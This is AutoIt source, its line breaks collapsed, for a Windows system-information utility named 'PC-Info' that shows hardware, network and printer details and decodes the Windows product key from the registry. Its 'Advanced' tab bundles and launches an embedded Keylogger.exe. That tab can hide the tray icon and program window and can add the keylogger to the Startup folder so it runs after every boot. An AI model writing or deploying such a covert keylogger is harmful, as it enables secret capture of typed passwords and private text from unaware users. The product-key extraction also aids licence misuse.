#Include Dim $INI, $POS, $IP, $URLS, $URL, $I, $IPTMP, $FS, $FILE, $LINE, $LINE1 Global $Orgn1 Global $Orgn2 Global $Orgn3 Global $Orgn4 Global $web = 0 WinClose("PC-Info", "") FileInstall("C:\pic.jpg", @TempDir & "\pic1.jpg",1) FileInstall("C:\PC.jpg", @TempDir & "\PC1.jpg",1) FileInstall("C:\Keylogger.exe", @TempDir & "\Keylogger.exe",1) FileInstall("C:\RunAtStartup.ini", @TempDir & "\RunAtStartup.ini") ;--------------------------------------------------------------- ; Find WAN iP-adresse ;--------------------------------------------------------------- $INI = @Homedrive & "myip.ini" If FileExists($INI) = 0 Then IniWrite($INI, "URL", "1", "dynupdate.no-ip.com") IniWrite($INI, "URL", "2", "www.bpftpserver.com") IniWrite($INI, "URL", "3", "www.minasithil.org") IniWrite($INI, "URL", "URLS", "3") EndIf $POS = 0 $IP = 0 $URLS = IniRead($INI, "URL", "URLS", "") For $I = 1 To $URLS FileDelete(@Homedrive & $POS + 1 & ".htm") Next While $POS < $URLS FileDelete(@Homedrive & $POS - 1 & ".htm") $POS = $POS + 1 $IPTMP = @Homedrive & $POS & ".htm" $URL = IniRead($INI, "URL", $POS, "") $IP = URLDownloadToFile ("http://" & $URL & "/ip.php", $IPTMP) $FS = FileGetSize($IPTMP) If FileExists($IPTMP) = 0 Then ContinueLoop If $FS > 16 Then ContinueLoop Else If $FS < 8 Then ContinueLoop EndIf If $FS <= 16 Then ExitLoop Wend $FILE = FileOpen($IPTMP, 0) $LINE = FileReadLine($FILE) If $FILE = -1 Then $line = "Error when looking up IP. Maybe you're offline?" EndIf FileClose($FILE) FileDelete($IPTMP) FileDelete($INI) ;--------------------------------------------------------------- ; Windows Product Key ;--------------------------------------------------------------- Dim $Bin $Bin = RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion", "DigitalProductID") Func DecodeProductKey($BinaryDPID) Local $bKey[15] Local $sKey[29] Local $Digits[24] Local $Value = 0 Local $hi = 0 Local $n = 0 Local $i = 0 Local $dlen = 29 Local $slen = 15 Local $Result $Digits = StringSplit("BCDFGHJKMPQRTVWXY2346789", "") $binaryDPID = StringMid($binaryDPID, 105, 30) For $i = 1 To 29 Step 2 $bKey[Int($i / 2) ] = Dec(StringMid($binaryDPID, $i, 2)) Next For $i = $dlen - 1 To 0 Step - 1 If Mod( ($i + 1), 6) = 0 Then $sKey[$i] = "-" Else $hi = 0 For $n = $slen - 1 To 0 Step - 1 $Value = BitOR(BitShift($hi, -8), $bKey[$n]) $bKey[$n] = Int($Value / 24) $hi = Mod($Value, 24) Next $sKey[$i] = $Digits[$hi + 1] EndIf Next For $i = 0 To 28 $Result = $Result & $sKey[$i] Next Return $Result EndFunc ;------------------------------------------------------------- ; Script start ;------------------------------------------------------------- $primaryGui = GUICreate("PC-Info", 405, 490) ;/////////////////////// MY COMPUTER ///////////////////////// ;------------------------------------------------------------- $tab = GUICtrlCreateTab(5, 5, 398, 462) $knap = GUICtrlCreateButton("Print PC-Info", 325, 2, 77, 23) GUICtrlSetTip(-1,"Click here to print all information to a text file") $tab0 = GUICtrlCreateTabItem("My computer") $n=GUICtrlCreatePic(@TempDir &"\pic1.jpg",100,250, 1, 1) $n = GUICtrlSetPos($n, 20, 242, 365, 212) GUICtrlCreateGroup("Information", 16, 33, 373, 202) GUICtrlCreateGroup("", 16, 231, 373, 227) GUICtrlCreateLabel("Computername", 30, 60, 90, 15) GUICtrlCreateLabel("Operating System", 30, 85, 100, 15) GUICtrlCreateLabel("Service Pack", 30, 110, 90, 15,) GUICtrlCreateLabel("LAN IP-address", 30, 135, 90, 15,) GUICtrlCreateLabel("WAN IP-address", 30, 160, 95, 15,) GUICtrlCreateLabel("Logged in as", 30, 184, 90, 15,) GUICtrlCreateLabel("Login domain", 30, 209, 90, 15,) GUICtrlCreateInput(@ComputerName, 130, 58, 250, 20, $WS_DISABLED) GUICtrlCreateInput(@OSVersion, 130, 83, 250, 20, $WS_DISABLED) GUICtrlCreateInput(@OSServicePack, 130, 108, 250, 20, $WS_DISABLED) GUICtrlCreateInput(@IPAddress1, 130, 133, 250, 20, $WS_DISABLED) GUICtrlCreateInput($Line, 130, 158, 250, 20, $WS_DISABLED) GUICtrlCreateInput(@UserName, 130, 183, 250, 20, $WS_DISABLED) GUICtrlCreateInput(@LogonDomain, 130, 208, 250, 20, $WS_DISABLED) ;//////////////////// SECIFICATIONS ////////////////////// ;--------------------------------------------------------- $tab1 = GUICtrlCreateTabItem("Specifications") $J = GUICtrlCreatePic(@TempDir &"\PC1.jpg", 30, 380, 343, 70) $J = GUICtrlSetPos($J, 30, 380, 343, 70) GUICtrlCreateGroup("Hardware specifications", 16, 33, 373, 426) $drev = DriveGetDrive("fixed") $Ram = MemGetStats() $Mem = $ram[1] / 1024 + 1 $mem1 = Round($mem, 0) $Drive1 = DriveSpaceTotal($Drev[1]) $label1 = DriveGetLabel($Drev[1]) $Drivespace1 = DriveSpaceFree($Drev[1]) $Space = $Drivespace1 / 1024 $Free1 = Round($Space, 2) $var1 = $Drive1 / 1024 $Orgn1 = Round($var1, 2) If $drev[0] > 1 Then $label2 = DriveGetLabel($Drev[2]) $Drivespace2 = DriveSpaceFree($Drev[2]) $Space = $Drivespace2 / 1024 $Free2 = Round($Space, 2) $Drive2 = DriveSpaceTotal($Drev[2]) $var2 = $Drive2 / 1024 $Orgn2 = Round($var2, 2) GUICtrlCreateLabel("Drive2 " & " - (" & $drev[2] & ")", 30, 160, 90, 15,) GUICtrlCreateInput($Orgn2 & " GB" & " - ( Free space - " & $Free2 & " GB )", 105, 158, 275, 20, $WS_DISABLED) Else GUICtrlCreateInput("You don't have 2 harddrives or partitions", 105, 158, 275, 20, $WS_DISABLED) GUICtrlCreateLabel("Drive2 ", 30, 160, 70, 15,) EndIf If $drev[0] > 2 Then $label3 = DriveGetLabel($Drev[3]) $Drivespace3 = DriveSpaceFree($Drev[3]) $Space = $Drivespace3 / 1024 $Free3 = Round($Space, 2) $Drive3 = DriveSpaceTotal($Drev[3]) $var3 = $Drive3 / 1024 $Orgn3 = Round($var3, 3) GUICtrlCreateLabel("Drive3 " & " - (" & $drev[3] & ")", 30, 185, 90, 15,) GUICtrlCreateInput($Orgn3 & " GB" & " - ( Free space - " & $Free3 & " GB )", 105, 183, 275, 20, $WS_DISABLED) Else GUICtrlCreateInput("You don't have 3 harddrives or partitions", 105, 183, 275, 20, $WS_DISABLED) GUICtrlCreateLabel("Drive3 ", 30, 185, 70, 15,) EndIf If $drev[0] > 3 Then $label4 = DriveGetLabel($Drev[4]) $Drivespace4 = DriveSpaceFree($Drev[4]) $Space = $Drivespace4 / 1024 $Free4 = Round($Space, 2) $Drive4 = DriveSpaceTotal($Drev[4]) $var4 = $Drive4 / 1024 $Orgn4 = Round($var4, 3) GUICtrlCreateLabel("Drive4 " & " - (" & $drev[4] & ")", 30, 210, 90, 15,) GUICtrlCreateInput($Orgn4 & " GB" & " - ( Free space - " & $Free4 & " GB )", 105, 208, 275, 20, $WS_DISABLED) Else GUICtrlCreateInput("You don't have 4 harddrives or partitions", 105, 208, 275, 20, $WS_DISABLED) GUICtrlCreateLabel("Drive4 ", 30, 210, 70, 15,) EndIf GUICtrlCreateLabel("Processor", 30, 60, 90, 15) GUICtrlCreateLabel("RAM", 30, 85, 90, 15) GUICtrlCreateLabel("Video card", 30, 110, 90, 15) GUICtrlCreateLabel("Drive1 " & " - (" & $drev[1] & ")", 30, 135, 90, 15,) $cpu0 = RegRead("HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0", "~MHz") $cpu1 = RegRead("HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0", "processorNameString") $gfx = RegRead("HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000", "DriverDesc") $Lprint1 = RegEnumKey("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Print\Printers\", 1) $Lprint2 = RegEnumKey("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Print\Printers\", 2) $stringtjek = StringIsASCII($Lprint1) If $stringtjek = 0 Then GUICtrlCreateInput("No printer installed", 105, 254, 275, 20, $WS_DISABLED) Else GUICtrlCreateInput($Lprint1, 105, 254, 275, 20, $WS_DISABLED) EndIf $stringtjek = StringIsASCII($Lprint2) If $stringtjek = 0 Then GUICtrlCreateInput("No printer installed", 105, 279, 275, 20, $WS_DISABLED) Else GUICtrlCreateInput($Lprint2, 105, 279, 275, 20, $WS_DISABLED) EndIf $serv = RegEnumKey("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Print\Providers\LanMan Print Services\Servers", 1) $NetPrint1 = RegEnumKey("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Print\Providers\LanMan Print Services\Servers\" & $serv & "\printers", 1) $NetPrint2 = RegEnumKey("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Print\Providers\LanMan Print Services\Servers\" & $serv & "\printers", 2) $stringtjek = StringIsASCII($NetPrint1) If $stringtjek = 0 Then GUICtrlCreateInput("No printer installed", 105, 329, 275, 20, $WS_DISABLED) Else GUICtrlCreateInput($NetPrint1, 105, 329, 275, 20, $WS_DISABLED) EndIf $stringtjek = StringIsASCII($Netprint2) If $stringtjek = 0 Then GUICtrlCreateInput("No printer installed", 105, 354, 275, 20, $WS_DISABLED) Else GUICtrlCreateInput($NetPrint2, 105, 354, 275, 20, $WS_DISABLED) EndIf GUICtrlCreateInput($cpu0 & " Mhz" & " - " & $cpu1, 105, 58, 275, 20, $WS_DISABLED) GUICtrlCreateInput($mem1 & " MB", 105, 83, 275, 20, $WS_DISABLED) GUICtrlCreateInput($gfx & "", 105, 108, 275, 20, $WS_DISABLED) GUICtrlCreateInput($Orgn1 & " GB" & " - ( Free space - " & $Free1 & " GB )", 105, 133, 275, 20, $WS_DISABLED) GUICtrlCreateLabel("Printer1", 30, 256, 70, 15) GUICtrlCreateLabel("Printer2", 30, 281, 70, 15) GUICtrlCreateLabel("Netprinter1", 30, 331, 70, 15) GUICtrlCreateLabel("Netprinter2", 30, 356, 70, 15) GUICtrlCreateLabel("Local printers", 162, 235, 90, 15) GUICtrlCreateLabel("Network printers", 155, 310, 100, 15) ;/////////////////////// ADVANCED ///////////////////////// ;---------------------------------------------------------- $tab2 = GUICtrlCreateTabItem("Advanced") GUICtrlCreateGroup("Windows XP CD-Key Changer", 16, 33, 373, 95) GUICtrlCreateGroup("KeyLogger", 16, 130, 373, 325) $clipget = GUICtrlCreatebutton("Windows Key", 30, 65, 97, 22,) GUICtrlSetTip(-1,"Click here to copy key to clipboard") $newkey_btn = GUICtrlCreateButton("Change Key", 30, 90, 97, 22,) GUICtrlSetTip(-1,"Click here to change your XP key") $currentkey = GUICtrlCreateInput(DecodeProductKey($bin), 130, 66, 250, 20, $WS_DISABLED) $newkey = GUICtrlCreateInput("Type the new Windows XP CD-key here...", 130, 91, 250, 20) $Moreinfo = GUICtrlCreateLabel("You can use the keylogger to log whatever have been writen on the keyboard. Choose any options in order to fit your needs. Remember to chose save location for log file... click for more info", 50 , 150, 320, 70,) GUICtrlSetCursor(-1, 4) GUICtrlSetTip(-1,"Click to read more about keylogger") GUICtrlSetFont(-1, 9, 600, 1, "Comic Sans MS") $activate_key = GUICtrlCreateButton("Activate Keylogger", 135, 223, 130, 27,) GUICtrlSetTip(-1,"Click here to Activate Keylogger") $radio1 = GUICtrlCreateRadio ("Show program in system tray", 45, 260, 200, 20) $radio2 = GUICtrlCreateRadio ("Hide Trayicon and PC-Info when running", 45, 285, 250, 20) GUICtrlSetState ($radio2,$GUI_CHECKED) GUICtrlCreateGroup("", 35, 252, 333, 55) $radio3 = GUICtrlCreateRadio ("Determinate Keylogger with Hotkey 'Ctrl+Alt+Q'", 45, 315, 315, 20) $radio4 = GUICtrlCreateRadio ("Run at next startup, hotkey 'Ctrl+Alt+Q' for determination", 45, 340, 320, 20) $radio5 = GUICtrlCreateRadio ("Run now, and keep running after each boot", 45, 365, 320, 20) $radio6 = GUICtrlCreateRadio ("Run from next boot, and keep running after each boot", 45, 390, 320, 20) GUICtrlSetState ($radio3,$GUI_CHECKED) GUICtrlCreateGroup("", 35, 307, 333, 105) $Savefile = GUICtrlCreatebutton("Save location", 30, 422, 97, 22,) GUICtrlSetTip(-1,"Click here to chose savelocation of the logfile") $savelocation = GUICtrlCreateInput(@HomeDrive & "\Log.log", 130, 423, 250, 20, $WS_DISABLED) GUISetstate() ;////////////////////// ABOUT ///////////////////////////// ;---------------------------------------------------------- ;~ $tab3 = GUICtrlCreateTabItem("About") ;~ GUICtrlSetCursor(-1, 4) ;~ GUICtrlSetState(0, $GUI_SHOW) ;~ GUISetState() ;~ GUICtrlCreateLabel("Version 1.4", 330, 470, 70, 15) ;~ GUICtrlCreateLabel("Made by Lasse Offt", 10, 470, 140, 15) ;~ GUISetState() ;/////// SECONDARY WINDOW /////// $SecondaryGui = GUICreate("Change Your Windows Key", 270, 150) GUICtrlCreateLabel("WARNING", 90, 13, 100, 20) GUICtrlSetFont(-1, 14, 400, 4, "Comic Sans MS") GUICtrlCreateLabel("Changing your Windows CD-Key is on your own risk, I will not take any responsebility for any damage caused by this act! ", 10, 45, 250, 50) GUICtrlCreateLabel("Are you sure?", 10, 90, 70, 15) $key_yes = GUICtrlCreateButton("YES", 30, 115, 90, 22) $key_no = GUICtrlCreateButton("Cancel", 150, 115, 90, 22) GUISetState(@SW_HIDE) ;///////////////////////////////// ;/////// MORE INFO WINDOW /////// $MoreInfoGui = GUICreate("About Keylogger", 320, 480) GUICtrlCreateLabel("* Show Program in system tray", 10, 25, 250, 20) GUICtrlSetFont(-1, 9, 600, 1, "Comic Sans MS") GUICtrlSetColor(-1,0x0055D5) GUICtrlCreateLabel("Enables the system tray icon for PC-Info and Keylogger when running", 10, 40, 300, 40) GUICtrlSetFont(-1, 9, 600, 1, "Comic Sans MS") GUICtrlCreateLabel("* Hide trayicon and PC-Info when running", 10, 90, 300, 20) GUICtrlSetFont(-1, 9, 600, 1, "Comic Sans MS") GUICtrlSetColor(-1,0x0055D5) GUICtrlCreateLabel("Hides the system tray icon for PC-Info and Keylogger when running", 10, 105, 300, 40) GUICtrlSetFont(-1, 9, 600, 1, "Comic Sans MS") GUICtrlCreateLabel("* Determinate keylogger with hotkey Ctrl+Alt+Q", 10, 155, 300, 20) GUICtrlSetFont(-1, 9, 600, 1, "Comic Sans MS") GUICtrlSetColor(-1,0x0055D5) GUICtrlCreateLabel("Enables the keylogger when Activate is pressed, determinate the keylogger by pressing Ctrl+Alt+Q ", 10, 170, 300, 60) GUICtrlSetFont(-1, 9, 600, 1, "Comic Sans MS") GUICtrlCreateLabel("* Run at nextstartup, Hothey Ctrl+Alt+Q for determination", 10,235, 300, 20) GUICtrlSetFont(-1, 9, 600, 1, "Comic Sans MS") GUICtrlSetColor(-1,0x0055D5) GUICtrlCreateLabel("Runs the Keylogger at next boot, and only this boot, 'Ctrl+Alt+Q'", 10, 250, 300, 40) GUICtrlSetFont(-1, 9, 600, 1, "Comic Sans MS") GUICtrlCreateLabel("* Run now, and keep running after each boot", 10,300, 300, 20) GUICtrlSetFont(-1, 9, 600, 1, "Comic Sans MS") GUICtrlSetColor(-1,0x0055D5) GUICtrlCreateLabel("Enables the Keylogger, and runs after each boot, 'Ctrl+Alt+Q'", 10, 315, 300, 40) GUICtrlSetFont(-1, 9, 600, 1, "Comic Sans MS") GUICtrlCreateLabel("* Run from next boot, and keep running after each boot", 10,365, 300, 40) GUICtrlSetFont(-1, 9, 600, 1, "Comic Sans MS") GUICtrlSetColor(-1,0x0055D5) GUICtrlCreateLabel("Enables the Keylogger at next boot, and runs after each boot, 'Ctrl+Alt+Q'", 10, 400, 300, 40) GUICtrlSetFont(-1, 9, 600, 1, "Comic Sans MS") $Back = GUICtrlCreateButton("ok", 110, 445, 90, 22) GUISetState(@SW_HIDE) ;/////////////////////////////// GUISetFont(9, 300) $website = "http://www.ige.dk" While 1 $msg_array = GUIGetMsg(1) $msg = $msg_array[0] $winActive = $msg_array[1] If $msg = $activate_key Then If GUICtrlRead($radio1) = $GUI_CHECKED Then;Show Program in system tray IniWrite(@TempDir & "\RunAtStartup.ini", "ShowTray", "ShowTray", "1") EndIf If GUICtrlRead($radio2) = $GUI_CHECKED Then ;Hide trayicon and PC-Info when running IniWrite(@TempDir & "\RunAtStartup.ini", "ShowTray", "ShowTray", "0") EndIf If GUICtrlRead($radio3) = $GUI_CHECKED Then ;Determinate keylogger with hotkey Ctrl+Alt+Q EndIf If GUICtrlRead($radio4) = $GUI_CHECKED Then ;Run at nextstartup, Hothey Ctrl+Alt+Q for determination FileCreateShortcut(@Tempdir & "\Keylogger.exe",@StartupDir & "\Keylogger.exe") IniWrite(@TempDir & "\RunAtStartup.ini", "RunAtStartup", "RunAtStartup", "1") If GUICtrlRead($radio1) = $GUI_CHECKED Then TrayTip("Keylogger", "Keylogger will run in VISIBLE mode next time Windows starts" & @CRLF & "Determinate by pressing Ctrl+Alt+Q", 5, 1) Sleep(5000) Else TrayTip("Keylogger", "Keylogger will run in INVISIBLE mode next time Windows starts" & @CRLF & "Determinate by pressing Ctrl+Alt+Q", 5, 1) Sleep(7000) EndIf EndIf If GUICtrlRead($radio5) = $GUI_CHECKED Then ;Run now, and keep running after each boot If GUICtrlRead($radio1) = $GUI_CHECKED Then TrayTip("Keylogger", "Keylogger is now active, and will be running in VISIBLE mode after each boot" & @CRLF & "Determinate by pressing Ctrl+Alt+Q", 5, 1) Sleep(5000) Else TrayTip("Keylogger", "Keylogger is now active, and will be running in INVISIBLE mode after each boot" & @CRLF & "Determinate by pressing Ctrl+Alt+Q", 5, 1) Sleep(5000) EndIf FileCreateShortcut(@Tempdir & "\Keylogger.exe",@StartupDir & "\Keylogger.exe") IniWrite(@TempDir & "\RunAtStartup.ini", "RunAtStartup", "RunAtStartup", "2") EndIf If GUICtrlRead($radio6) = $GUI_CHECKED Then ;Run from next boot, and keep running after each boot If GUICtrlRead($radio1) = $GUI_CHECKED Then TrayTip("Keylogger", "Keylogger will be active after next boot, and will be running in VISIBLE mode" & @CRLF & "Determinate by pressing Ctrl+Alt+Q", 5, 1) Sleep(5000) Else TrayTip("Keylogger", "Keylogger will be actice after next boot, and will be running in INVISIBLE mode" & @CRLF & "Determinate by pressing Ctrl+Alt+Q", 5, 1) Sleep(7000) EndIf FileCreateShortcut(@Tempdir & "\Keylogger.exe",@StartupDir & "\Keylogger.exe") IniWrite(@TempDir & "\RunAtStartup.ini", "RunAtStartup", "RunAtStartup", "2") EndIf IniWrite(@TempDir & "\RunAtStartup.ini", "SaveLocation", "SaveLocation", GUICtrlRead($savelocation)) If GUICtrlRead($radio3) = $GUI_CHECKED Then Run(@TempDir & "\Keylogger.exe") EndIf If GUICtrlRead($radio5) = $GUI_CHECKED Then Run(@TempDir & "\Keylogger.exe") EndIf If GUICtrlRead($radio3) = $GUI_CHECKED Then TrayTip("Keylogger", "Keylogger is now active" & @CRLF & "Determinate by pressing Ctrl+Alt+Q", 0, 1) Sleep(5000) EndIf If GUICtrlRead($radio2) = $GUI_CHECKED Then Opt("TrayIconHide", 1) EndIf EndIf If $msg = GUICtrlRead($radio4)= $GUI_CHECKED Then GUICtrlsetstate($radio5, $GUI_ENABLE) EndIf If $msg = GUICtrlRead($radio3) = $GUI_CHECKED Then GUICtrlsetstate($radio5, $GUI_DISABLE) EndIf; End of Activate keylogger If $msg = $savefile Then $dialog = FileSaveDialog( "Choose a name", @HomeDrive & "\","(*.log)", 3, "Log.log") If @error Then GUICtrlSetData($savelocation, @Homedrive & "\Log.log") Else GUICtrlSetData($savelocation, $dialog) EndIf EndIf If $msg = $clipget Then clipput(GUICtrlRead($currentkey)) EndIf If $msg = $newkey_btn Then GUISwitch($SecondaryGui) GUISetState() EndIf If $msg = $Moreinfo Then GUISwitch($MoreInfoGui) GUISetState() EndIf If ($msg = $GUI_EVENT_CLOSE OR $msg = $back) AND $winActive = $MoreInfoGui Then GUISetState(@SW_HIDE) GUISwitch($primaryGui) EndIf If ($msg = $GUI_EVENT_CLOSE OR $msg = $key_no) AND $winActive = $secondaryGui Then GUISetState(@SW_HIDE) GUISwitch($primaryGui) EndIf If $msg = $GUI_EVENT_CLOSE AND $winActive = $primaryGui Then FileDelete(@TempDir & "\pic1.jpg") FileDelete(@TempDir & "\PC1.jpg") FileDelete(@TempDir & "\KeyOpt.ini") If GUICtrlRead($radio3) = $GUI_CHECKED Then FileDelete(@TempDir & "\RunAtStartup.ini") FileDelete(@TempDir & "\Keylogger.exe") EndIf ExitLoop EndIf If $msg = $key_yes Then $len = StringLen(GUIctrlRead($newkey)) If $len = 29 then msgbox(0,"Information","Your CD-key has been changed!") GUICtrlSetData($currentkey, GUICtrlread($newkey)) GUICtrlSetData($newkey,"Type the new Windows XP CD-key here...") WinClose("Change Your Windows Key", "") else msgbox(16,"Error","CD-Key is invalid, try again") GUICtrlSetData($newkey,"Type the new Windows XP CD-key here...") WinClose("Change Your Windows Key", "") Endif EndIf If $msg = $key_no Then GUICtrlSetData($newkey,"Type the new Windows XP CD-key here...") EndIf ;If $msg = $knap1 Then ; Run('explorer "' & $website & '"') ;EndIf If $msg = $knap Then $svar = MsgBox(4, "Information", "Do you want PC-Info to create and save a text-document with your informations in it on your desktop?") If $svar = 6 Then If FileExists(@DesktopDir & "\System Information.txt") Then FileDelete(@DesktopDir & "\System Information.txt") FileWriteLine(@DesktopDir & "\System Information.txt", " PC-Info version 1.4") FileWriteLine(@DesktopDir & "\System Information.txt", "") FileWriteLine(@DesktopDir & "\System Information.txt", "") FileWriteLine(@DesktopDir & "\System Information.txt", "") FileWriteLine(@DesktopDir & "\System Information.txt", "") FileWriteLine(@DesktopDir & "\System Information.txt", "Computername: " & @ComputerName) FileWriteLine(@DesktopDir & "\System Information.txt", "") FileWriteLine(@DesktopDir & "\System Information.txt", "Operating system: " & @OSVersion) FileWriteLine(@DesktopDir & "\System Information.txt", "") FileWriteLine(@DesktopDir & "\System Information.txt", "Servicepack: " & @OSServicePack) FileWriteLine(@DesktopDir & "\System Information.txt", "") FileWriteLine(@DesktopDir & "\System Information.txt", "LAN IP-address: " & @IPAddress1) FileWriteLine(@DesktopDir & "\System Information.txt", "") FileWriteLine(@DesktopDir & "\System Information.txt", "WAN IP-address: " & $Line) FileWriteLine(@DesktopDir & "\System Information.txt", "") FileWriteLine(@DesktopDir & "\System Information.txt", "Logged in as: " & @UserName) FileWriteLine(@DesktopDir & "\System Information.txt", "") FileWriteLine(@DesktopDir & "\System Information.txt", "Login domain: " & @LogonDomain) FileWriteLine(@DesktopDir & "\System Information.txt", "") FileWriteLine(@DesktopDir & "\System Information.txt", "Processor-speed: " & $cpu0 & " Mhz") FileWriteLine(@DesktopDir & "\System Information.txt", "") FileWriteLine(@DesktopDir & "\System Information.txt", "Amount of RAM: " & $mem1 & " MB") FileWriteLine(@DesktopDir & "\System Information.txt", "") FileWriteLine(@DesktopDir & "\System Information.txt", "Video card: " & $gfx) FileWriteLine(@DesktopDir & "\System Information.txt", "") FileWriteLine(@DesktopDir & "\System Information.txt", "Harddisk 1: " & $Drev[1] & " " & $Orgn1 & " GB i alt") If $drev[0] > 1 Then FileWriteLine(@DesktopDir & "\System Information.txt", "Harddrive 2: " & $Drev[2] & " " & $Orgn2 & " GB i alt") Else FileWriteLine(@DesktopDir & "\System Information.txt", "Harddrive 2: You don't have 2 harddrives or partitions") EndIf If $drev[0] > 2 Then FileWriteLine(@DesktopDir & "\System Information.txt", "Harddrive 3: " & $Drev[3] & " " & $Orgn3 & " GB i alt") Else FileWriteLine(@DesktopDir & "\System Information.txt", "Harddrive 3: You don't have 2 harddrives or partitions") EndIf If $drev[0] > 3 Then FileWriteLine(@DesktopDir & "\System Information.txt", "Harddrive 4: " & $Drev[4] & " " & $Orgn3 & " GB i alt") FileWriteLine(@DesktopDir & "\System Information.txt", "") FileWriteLine(@DesktopDir & "\System Information.txt", "") Else FileWriteLine(@DesktopDir & "\System Information.txt", "Harddrive 4: You don't have 2 harddrives or partitions") FileWriteLine(@DesktopDir & "\System Information.txt", "") FileWriteLine(@DesktopDir & "\System Information.txt", "") EndIf EndIf $stringtjek = StringIsASCII($Lprint1) If $stringtjek = 1 Then FileWriteLine(@DesktopDir & "\System Information.txt", "Local printer1: " & $Lprint1) Else FileWriteLine(@DesktopDir & "\System Information.txt", "Local printer1: No printer installed") EndIf $stringtjek = StringIsASCII($Lprint2) If $stringtjek = 1 Then FileWriteLine(@DesktopDir & "\System Information.txt", "Local printer2: " & $Lprint2) Else FileWriteLine(@DesktopDir & "\System Information.txt", "Local printer2: No printer installed") EndIf $stringtjek = StringIsASCII($NetPrint1) If $stringtjek = 1 Then FileWriteLine(@DesktopDir & "\System Information.txt", "Network printer1: " & $Netprint1) Else FileWriteLine(@DesktopDir & "\System Information.txt", "Network printer1: No printer installed") EndIf $stringtjek = StringIsASCII($NetPrint2) If $stringtjek = 1 Then FileWriteLine(@DesktopDir & "\System Information.txt", "Network printer2: " & $Netprint2) Else FileWriteLine(@DesktopDir & "\System Information.txt", "Network printer2: No printer installed") FileWriteLine(@DesktopDir & "\System Information.txt", "") FileWriteLine(@DesktopDir & "\System Information.txt", "") EndIf #cs FileWriteLine(@desktopdir & "\System Information.txt","Office-version: _________________________") FileWriteLine(@desktopdir & "\System Information.txt","") FileWriteLine(@desktopdir & "\System Information.txt","Forbindelse (ADSL/ISDN): _________________________") FileWriteLine(@desktopdir & "\System Information.txt","") FileWriteLine(@desktopdir & "\System Information.txt","Bærbar / stationær PC: _________________________") FileWriteLine(@desktopdir & "\System Information.txt","") FileWriteLine(@desktopdir & "\System Information.txt","") FileWriteLine(@desktopdir & "\System Information.txt","") FileWriteLine(@desktopdir & "\System Information.txt","Navn _______________________________ Dato ____________ ") #ce EndIf EndIf Wend